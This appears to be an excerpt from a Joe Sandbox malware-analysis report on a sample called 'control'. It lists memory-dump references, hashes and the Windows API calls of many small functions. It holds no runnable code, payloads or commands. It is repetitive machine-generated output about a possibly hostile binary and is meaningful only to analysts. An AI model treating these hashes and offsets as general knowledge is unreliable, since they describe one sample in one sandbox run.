                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AdjustPointer_memmove
                                                      • String ID:
                                                      • API String ID: 1721217611-0
                                                      • Opcode ID: f7bb1e2027c8e16282f0e3a6feacda1fe47804c2d424949662134a3496708540
                                                      • Instruction ID: 93f4f4492b9848a447a4813ebf6b47e3c6843374611b1ddcbe40567b5ef99b88
                                                      • Opcode Fuzzy Hash: f7bb1e2027c8e16282f0e3a6feacda1fe47804c2d424949662134a3496708540
                                                      • Instruction Fuzzy Hash: C441B3356157029EEB2ACE25E891B5A73F4EF41262F21006DF8049E792DF32FA81D720
                                                      APIs
                                                      • GetNativeSystemInfo.KERNEL32(93656AD3,93656AD3,00000000,?,00000000,100505E8,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F1C2
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00001000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F27C
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F2B4
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F2C4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateEvent$CountCriticalInfoInitializeNativeSectionSpinSystem
                                                      • String ID:
                                                      • API String ID: 2029452385-0
                                                      • Opcode ID: 48cc98ecf05bcf4a83353a1e2f05b4666f9f9ba61c6cc34eaeef7f0985bb3f22
                                                      • Instruction ID: ef2a892a8e3a634590cf7f156d9bf4d127c5d71b8d2808cd9302d73839e031fd
                                                      • Opcode Fuzzy Hash: 48cc98ecf05bcf4a83353a1e2f05b4666f9f9ba61c6cc34eaeef7f0985bb3f22
                                                      • Instruction Fuzzy Hash: 4141E6B1610B56ABE314CF69C958786FBF4FB04318F50421AE5189BA90D7BAB468CFC4
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10047ED2
                                                      • __isleadbyte_l.LIBCMT ref: 10047F00
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,1001BDE2,00000001,?,00000000,00000010,00000000,?,00000010,?,1001BDE2), ref: 10047F2E
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,1001BDE2,00000001,?,00000000,00000010,00000000,?,00000010,?,1001BDE2), ref: 10047F64
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: f04d3d578df15ec79b717b8811c2208a8e6eb84513cd13d46aaf3aef71c595e1
                                                      • Instruction ID: 7b9b075eb3fa09c121e4bd97e4ee65ffc9544b227e5841d369dfb56db6976ebf
                                                      • Opcode Fuzzy Hash: f04d3d578df15ec79b717b8811c2208a8e6eb84513cd13d46aaf3aef71c595e1
                                                      • Instruction Fuzzy Hash: 4031CF35600246AFDB22CF35CC44BAA7BE9FF05250F224578E868DB1A0E730EC55DB94
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$ErrorFileLastUnmapView
                                                      • String ID:
                                                      • API String ID: 4017539725-0
                                                      • Opcode ID: 3ceb2e20783662c0427984b4396cb28606d968d3780ffe89ea470a14c13c1fc5
                                                      • Instruction ID: afd46a3e9137c2c7161fb6f95e0b759404fca3bed561303b4318d2103f5cd4c8
                                                      • Opcode Fuzzy Hash: 3ceb2e20783662c0427984b4396cb28606d968d3780ffe89ea470a14c13c1fc5
                                                      • Instruction Fuzzy Hash: 48314C756143519FE700CF65D848B6BB7E8EB88B50F81491DF855D7280EF75D8048BA2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$ErrorFileLastUnmapView
                                                      • String ID:
                                                      • API String ID: 4017539725-0
                                                      • Opcode ID: 1f7536b180434f0ac689f1fd93ed1486ba2fcd2b55e6192a352b8c4e4ef55d60
                                                      • Instruction ID: 79f660d10e505635d13e7438cecf30ec9b8fed93fcc1d4ef52dd99797ee5355a
                                                      • Opcode Fuzzy Hash: 1f7536b180434f0ac689f1fd93ed1486ba2fcd2b55e6192a352b8c4e4ef55d60
                                                      • Instruction Fuzzy Hash: 92314D71204351DFD710CF65D884B2BB7E8FB88750F418A1DF855C7280EB75D8088B92
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DestroyHeap_free
                                                      • String ID:
                                                      • API String ID: 2273598101-0
                                                      • Opcode ID: 58df195094a383edf62aa2cb6d664e87594f6f477f4430481b31c9a0d40ee881
                                                      • Instruction ID: 492fe64dec8016b79279c80015900f38bb75996947eedb7b5902276d798321f9
                                                      • Opcode Fuzzy Hash: 58df195094a383edf62aa2cb6d664e87594f6f477f4430481b31c9a0d40ee881
                                                      • Instruction Fuzzy Hash: 703149B1A00B46ABEB15DF64D84878AFBE8FF04744F01462AE4549B680DBB5F918CBD1
                                                      APIs
                                                      • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 10024E20
                                                      • InterlockedCompareExchange.KERNEL32(?,?,?), ref: 10024E32
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CompareExchangeInterlocked
                                                      • String ID:
                                                      • API String ID: 3335655927-0
                                                      • Opcode ID: ae4addd928f558fdc1c118c3a60b518e17f7a3611848eb618db682bdd423e2fe
                                                      • Instruction ID: e1f2d79d789005ecf1d392b526d1b8d44dde72ede6ef427eec4980a95b84b268
                                                      • Opcode Fuzzy Hash: ae4addd928f558fdc1c118c3a60b518e17f7a3611848eb618db682bdd423e2fe
                                                      • Instruction Fuzzy Hash: 77216F726046099BD720DF69D980F86F3EDFB49310F42496EE699C7240DA71F9148B60
                                                      APIs
                                                        • Part of subcall function 10020D20: DeleteCriticalSection.KERNEL32(00000018,1005099E,1001E5A8,?,93656AD3,?,?,?,1005099E,000000FF), ref: 10020DCE
                                                        • Part of subcall function 10020D20: HeapFree.KERNEL32(?,00000000,00000000,?,93656AD3,?,?,?,1005099E,000000FF), ref: 10020DD9
                                                      • _free.LIBCMT ref: 1001E5DD
                                                      • _free.LIBCMT ref: 1001E631
                                                      • HeapDestroy.KERNEL32(?), ref: 1001E665
                                                      • HeapDestroy.KERNEL32(?), ref: 1001E66F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$Destroy_free$CriticalDeleteFreeSection
                                                      • String ID:
                                                      • API String ID: 981829196-0
                                                      • Opcode ID: 54cffe5bcdc0c28fb5e7ac4dfeee152347f5711852f878f0b869f9ce5ac5a81d
                                                      • Instruction ID: e5d762c26f5f4a4bd1cef0bd03f342e0547f0682f6a331dabc1adc5352ebfb56
                                                      • Opcode Fuzzy Hash: 54cffe5bcdc0c28fb5e7ac4dfeee152347f5711852f878f0b869f9ce5ac5a81d
                                                      • Instruction Fuzzy Hash: 78317EB5A00A45ABEB04CF64C848B9AF7E8FF14744F00422AE4589B380DBB5F854CBD1
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,93656AD3,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 100240D2
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 10024107
                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000057,?,00000000,93656AD3,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?), ref: 10024133
                                                      • SetLastError.KERNEL32(00000057,93656AD3,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 1002413A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CompletionEnterErrorLastLeavePostQueuedStatus
                                                      • String ID:
                                                      • API String ID: 1216617850-0
                                                      • Opcode ID: 527145bfde23408dc2ef0d79ea1e4c64725fdf5e0d848d6576dc0aa07ecb7eaf
                                                      • Instruction ID: d1afc4b1f62b75d7c0d42d46145dd7902132c798b5be5b94712711f6fd68f30f
                                                      • Opcode Fuzzy Hash: 527145bfde23408dc2ef0d79ea1e4c64725fdf5e0d848d6576dc0aa07ecb7eaf
                                                      • Instruction Fuzzy Hash: F321CF32600255EFDB10CF84DC84B9ABBF8FB44750F528669F9198B290CB759884CB50
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001BC87
                                                      • LocalAlloc.KERNEL32(00000040,00000000,1005ADE8,1005AF8C,1005ADE8,00000000,10168660,00000000,00000000), ref: 1001BCE2
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD03
                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD1A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Local$AllocByteCharFreeH_prologMultiWide
                                                      • String ID:
                                                      • API String ID: 1989602771-0
                                                      • Opcode ID: 06d34933d169b6f4ecb5672093e3b205bf0743133c652062ef2dc2e763a43428
                                                      • Instruction ID: 922f186abace7c5ffff782b3d96f56d83abaf94767c310c02c30585464adbbac
                                                      • Opcode Fuzzy Hash: 06d34933d169b6f4ecb5672093e3b205bf0743133c652062ef2dc2e763a43428
                                                      • Instruction Fuzzy Hash: 22118B75A00605ABEB14DF699C999BFFBB9EB88750B10052DE806AB250CB709E44C6A0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DestroyHeap_free
                                                      • String ID:
                                                      • API String ID: 2273598101-0
                                                      • Opcode ID: 05db630e56019362ad307cac461d0e9443326030edad1543d205fc14a9efd1c7
                                                      • Instruction ID: 5e3d9f0d04deac3397d6fa88b09c8b526b75e743cb1aaf46cffc163cfbb199ef
                                                      • Opcode Fuzzy Hash: 05db630e56019362ad307cac461d0e9443326030edad1543d205fc14a9efd1c7
                                                      • Instruction Fuzzy Hash: 6E2139B0A00B46AFEB15CF24D84974AF7E8FF04344F014619E8589B280DB75F924CBD1
                                                      APIs
                                                      • GetFileSize.KERNEL32(1002594E,00000000,00000000,00000000,1002594E,00000000), ref: 100252D2
                                                      • CreateFileMappingA.KERNEL32(1002594E,00000000,00000002,00000000,00000000,00000000), ref: 100252E6
                                                      • MapViewOfFileEx.KERNEL32(00000000,00000004,00000000,00000000,?,00000000), ref: 10025329
                                                      • CloseHandle.KERNEL32(?), ref: 1002533F
                                                        • Part of subcall function 100252A0: GetLastError.KERNEL32(1002533A), ref: 100252A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateErrorHandleLastMappingSizeView
                                                      • String ID:
                                                      • API String ID: 322783378-0
                                                      • Opcode ID: a72341e326a4ba0fbb02c033ca57f4eff7cf59df7aa94b10707fb8fa9e828f03
                                                      • Instruction ID: b24b83d2de12238dc06bc647823d72b1e2335c8e7f7e86260e440beeb8542a3f
                                                      • Opcode Fuzzy Hash: a72341e326a4ba0fbb02c033ca57f4eff7cf59df7aa94b10707fb8fa9e828f03
                                                      • Instruction Fuzzy Hash: 4F11A076600616BFE710DF68EC05B69BBB8FB08311F50422AFD01D3680D7B1A9649BE8
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100065EA
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,1005ADE8,?,?,?,10007379,?), ref: 10006601
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10006645
                                                      • ReleaseMutex.KERNEL32(?), ref: 10006677
                                                        • Part of subcall function 10009910: _memmove.LIBCMT ref: 100099A0
                                                        • Part of subcall function 10009910: _memmove.LIBCMT ref: 100099CD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_H_prologInternal_throw_exceptionMutexObjectReleaseSingleWait
                                                      • String ID:
                                                      • API String ID: 2263916551-0
                                                      • Opcode ID: 88ad9244caabe5c007718e5941219926d190531c6a1110f5919371641626691b
                                                      • Instruction ID: ed82df08a7a227c2f72e4939e7cd68ce9b9c32cd88a7dee2e31fc4f2862304be
                                                      • Opcode Fuzzy Hash: 88ad9244caabe5c007718e5941219926d190531c6a1110f5919371641626691b
                                                      • Instruction Fuzzy Hash: 5B216435A00B06AFEB28CF68C885A9AB7F1FF08351F10892DF06A97251CB75B904CB54
                                                      APIs
                                                      • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,100227E0,?,1001ED0E,93656AD3), ref: 100201F1
                                                        • Part of subcall function 10020310: InterlockedCompareExchange.KERNEL32(000001BF,00000100,000000FF), ref: 1002036A
                                                      • _free.LIBCMT ref: 10020215
                                                      • HeapDestroy.KERNEL32(?,?,?,?,?,?,100227E0,?,1001ED0E,93656AD3), ref: 10020243
                                                      • HeapCreate.KERNEL32(?,?,?,?,?,?,?,?,100227E0,?,1001ED0E,93656AD3), ref: 10020252
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$CompareCreateDestroyExchangeFreeInterlocked_free
                                                      • String ID:
                                                      • API String ID: 3571060031-0
                                                      • Opcode ID: 78171274b88b9d871781253e762ba40eb7b37c92cc86dd6b7c56485abf7519fb
                                                      • Instruction ID: 0a878298919a2728ada9c9bda282240638a9b5f958c97604bce3e13ab8e5967f
                                                      • Opcode Fuzzy Hash: 78171274b88b9d871781253e762ba40eb7b37c92cc86dd6b7c56485abf7519fb
                                                      • Instruction Fuzzy Hash: 901106B520070AEBD704CFA5D884B9AFBB9FF08344F50421AE90897651EB71F924CBA0
                                                      APIs
                                                      • _free.LIBCMT ref: 1001B524
                                                      • _free.LIBCMT ref: 1001B553
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,1001B3A2,?,000001C8), ref: 1001B573
                                                      • HeapFree.KERNEL32(00000000,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B57A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap_free$FreeProcess
                                                      • String ID:
                                                      • API String ID: 1072109031-0
                                                      • Opcode ID: 557abc633146d36798c19daa65f0b5d008b94df4e8b7e6fe234b61a76df1c4f3
                                                      • Instruction ID: 91e55399d9fdf6679953e435a265fa2e3a507e988a5e8b74e9227a28433c2d31
                                                      • Opcode Fuzzy Hash: 557abc633146d36798c19daa65f0b5d008b94df4e8b7e6fe234b61a76df1c4f3
                                                      • Instruction Fuzzy Hash: F0113532400F11EFDB619F65DD85A27BBEAFF04756705992EE19A4A921CB32F890CB00
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
